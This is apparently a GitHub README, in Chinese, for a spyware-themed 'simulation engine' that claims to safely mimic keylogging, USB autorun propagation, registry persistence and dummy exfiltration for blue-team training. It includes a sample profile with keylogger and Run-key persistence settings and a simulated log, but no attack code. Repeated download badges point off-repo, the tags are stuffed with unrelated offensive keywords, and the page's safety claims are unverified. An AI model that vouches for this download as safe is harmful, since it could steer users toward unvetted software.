KateyAS/Trojan.Cockroach-Edu-Spyware

GitHub: KateyAS/Trojan.Cockroach-Edu-Spyware

一款沙箱优先的恶意行为模拟教学引擎,通过安全地复现键盘记录、USB 传播和持久化等技术,帮助蓝队和安全专业学生理解攻击手法并构建防御策略。

Stars: 0 | Forks: 0

# 🪳 Sentinel.Cockroach • *自适应防御模拟框架* [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://KateyAS.github.io) ## 📋 目录 - [为什么选择 Sentinel.Cockroach?](#-why-sentinelcockroach) - [架构概览 (Mermaid 图)](#-architecture-overview-mermaid-diagram) - [核心功能](#-core-capabilities) - [操作系统兼容性](#-os-compatibility) - [配置文件示例](#-example-profile-configuration) - [控制台调用示例](#-example-console-invocation) - [API 集成 (OpenAI & Claude)](#-api-integrations-openai--claude) - [响应式 UI 与多语言支持](#-responsive-ui--multilingual-support) - [24/7 支持与社区](#-247-support--community) - [许可证与归属](#-licensing--attribution) - [免责声明](#-disclaimer) - [再次下载](#-download-again) ## 🚀 为什么选择 Sentinel.Cockroach? 想象一只在煤矿中的**数字金丝雀**——它不是武器,而是一面镜子。**Sentinel.Cockroach** 教你了解恶意软件如何*思考*、移动和隐藏,从而帮助你构建更好的防御。与其前身不同,这**不是**实时的间谍软件;它是一个在隔离环境中运行的**模拟引擎**,用于生成合成遥测数据和攻击模式,以培训蓝队、SOC 分析师和攻击性安全专业的学生。 **核心差异化优势:** - 🧪 **沙箱优先设计** – 所有操作都会被记录、可撤销,且永远不会触及真实系统。 - 📚 **教学支架** – 逐步注释揭示了每种技术(例如,键盘记录器如何挂钩 `GetAsyncKeyState`)。 - 🔐 **零数据渗出** – 数据保留在本地 SQLite 存储库中;邮件模块为虚拟存根。 - 🌐 **跨平台** – 并排学习 Windows、Linux 和 macOS 的感染途径。 ## 🧩 架构概览 (Mermaid 图) ``` graph TB A[Sentinel.Cockroach Launcher] --> B[Profile Loader] B --> C{Simulation Mode} C -->|USB Propagation| D[Virtual Drive Injector] C -->|Keylogging| E[Keystroke Simulator] C -->|Persistence| F[Registry / Cron Mimic] C -->|Exfiltration| G[Dummy SMTP Logger] D --> H[Sandbox Monitor] E --> H F --> H G --> H H --> I[Telemetry Dashboard] I --> J[OpenAI/Claude Analyzer] J --> K[Defense Report] style A fill:#f9d71c,stroke:#333,stroke-width:2px style H fill:#4caf50,stroke:#333,stroke-width:2px style K fill:#2196f3,stroke:#fff,stroke-width:2px ``` *每个模块都在具有完整审计跟踪的容器化环境中执行。* ## 🛡️ 核心功能 | 功能 | 描述 | 教学价值 | |---------|-------------|------------------| | 🪱 **USB 传播模拟器** | 模拟 autorun.inf 逻辑;检测写入阻止程序 | 了解蠕虫如何绕过 `NoDriveTypeAutoRun` | | ⌨️ **击键模式分析器** | 捕获合成击键序列 | 理解挂钩链与消息泵 | | 📬 **虚拟渗出引擎** | 生成虚假电子邮件警报(无真实发送) | 研究 MAPI 与 SMTP 协议嵌入 | | 🧬 **持久化模拟器** | 测试运行键、launchd plists、systemd 服务 | 比较特定操作系统的启动机制 | | 📡 **遥测仪表板** | 模拟感染的实时图表 | 可视化攻击杀伤链 (MITRE ATT&CK 映射) | | 🤖 **AI 防御顾问** | OpenAI/Claude 集成,提供对策建议 | *详见下方 API 部分* | **“免费”/“黑客”工具的独特替代品:** *开源学习密钥* – 零成本,无漏洞利用——只有纯粹的知识。 ## 💻 操作系统兼容性 | 操作系统 | 状态 | 表情符号 | |:----------------|:-------|:-----:| | Windows 10/11 (x64) | ✅ 完整模拟 | 🪟 | | Ubuntu 22.04+ | ✅ 完整模拟 | 🐧 | | macOS Ventura+ | ✅ 部分(无 USB) | 🍏 | | Kali Linux 2026 | ✅ 已优化 | 🐉 | | Raspberry Pi OS | ⚠️ 受限 | 🥧 | *在 2026 年第一季度发布周期内于 Windows 11 23H2 和 Ubuntu 24.04 LTS 上进行了测试。* ## ⚙️ 配置文件示例 创建 `profile.json` 以自定义你的模拟: ``` { "simulation_name": "Red Team Drill 2026", "target_os": "windows", "modules": { "keylogger": { "enabled": true, "capture_interval_ms": 500, "exfil_method": "dummy_smtp" }, "usb_propagation": { "enabled": true, "max_drives": 3, "autorun_type": "classic" }, "persistence": { "registry_key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "value_name": "SentinelHelper" } }, "ai_advisor": { "provider": "openai", "model": "gpt-5-turbo-2026" } } ``` *所有路径均为虚拟;引擎会使用沙箱存根替换真实的 OS 路径。* ## 🖥️ 控制台调用示例 使用详细日志记录启动训练场景: ``` sentinel-cockroach --profile ./drills/corp_espionage.json --sandbox --output verbose ``` **输出片段:** ``` [2026-04-01 10:23:47] 🔍 Loaded profile: corp_espionage.json [2026-04-01 10:23:48] 🧪 Sandbox initialized at /tmp/sentinel_sandbox/ [2026-04-01 10:23:49] ⌨️ Keystroke simulator started (500ms interval) [2026-04-01 10:23:50] 📬 Dummy SMTP server listening on port 2525 [2026-04-01 10:23:51] 🪱 USB drive /dev/sdb1 detected (simulated) ``` *不捕获真实击键;仅使用预定义词表中的虚拟字符串。* ## 🤖 API 集成 (OpenAI & Claude) **Sentinel.Cockroach** 与 AI 配合提供**防御情报**: ### OpenAI 集成 - **端点:** `POST /api/analyze-threat` - **目的:** 将模拟日志片段发送至 GPT-5 进行 MITRE ATT&CK 映射 - **提示词示例:** *"鉴于此 Windows 注册表持久化尝试,为 Sysmon 建议三条检测规则。"* ### Claude 集成 - **端点:** `POST /api/recommend-defense` - **目的:** Claude 4 生成自然语言的事件响应剧本 - **输出示例:** *"通过 GPO 'Turn off Autoplay' 阻止 autorun.inf,并监控事件 ID 4656 以获取注册表更改。"* **设置:** 包含 `OPENAI_API_KEY` 和 `ANTHROPIC_API_KEY` 的 `.env` 文件 – *你的密钥,你做主。* ## 🌍 响应式 UI 与多语言支持 Web 仪表板可适应**任何屏幕**: | 视口 | 布局 | 语言 | |----------|--------|-----------| | 桌面端 (1920px) | 完整遥测网格 | 🇺🇸 EN, 🇪🇸 ES, 🇫🇷 FR, 🇩🇪 DE, 🇯🇵 JP | | 平板端 (768px) | 堆叠卡片 | 🇨🇳 ZH, 🇰🇷 KO, 🇧🇷 PT-BR | | 移动端 (375px) | 可折叠导航 | 🇷🇺 RU, 🇮🇳 HI, 🇸🇦 AR | *翻译由社区通过 Weblate 贡献 – 欢迎提交 PR 以添加你的语言!* ## 🕐 24/7 支持与社区 - **Discord:** 与开发人员和安全研究人员实时聊天(链接位于仓库侧边栏) - **GitHub Discussions:** 发布场景,分享检测规则 - **办公时间:** 每周三 16:00 UTC – *带上你的沙箱日志* ## ⚖️ 许可证与归属 本项目在 **MIT License** 下发布 – 详见 [LICENSE](https://opensource.org/licenses/MIT)。 **版权所有 © 2026** *由红队教育社区倾注 ❤️ 构建。* **致谢:** 灵感来源于最初的 Trojan.Cockroach 概念,但已完全重构为一个安全、具有教育意义的模拟工具。不包含任何恶意代码载荷。 ## ⚠️ 免责声明 **Sentinel.Cockroach** 是一款专为以下用途设计的**防御性训练工具**: - 道德黑客课程 - SOC 模拟实验室 - 恶意软件分析课堂 - 个人网络安全教育 **在任何情况下**,均不得在未获得系统所有者明确书面许可的情况下将此软件部署于其系统上。开发者对滥用行为(包括但不限于未经授权的监控、数据盗窃或系统入侵)承担**零责任**。 **如果你正在寻找真实的恶意软件代码,你来错仓库了。** *本 README 的存在是为了教学,而非武器化。* ## 📥 再次下载 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://KateyAS.github.io) *模拟。分析。防御。循环往复。* – Sentinel.Cockroach 团队,2026
标签:AI安全, C2仿真, Chat Copilot, Claude, Conpot, CVE检测, DAST, HTTP工具, macOS安全, OpenAI, Petitpotam, Python, RAT, SOC分析师, SQLite, USB传播, Windows安全, XML 请求, 云资产清单, 内存规避, 大语言模型集成, 安全培训, 安全开发, 恶意软件分析, 恶意软件分析工具, 攻击模拟, 数字取证, 无后门, 沙盒环境, 网络安全教育, 自动化脚本, 蓝队演练, 蓝队训练, 远程访问木马, 逆向工具, 逆向工程, 遥测数据, 键盘记录器, 防御仿真框架, 驱动签名利用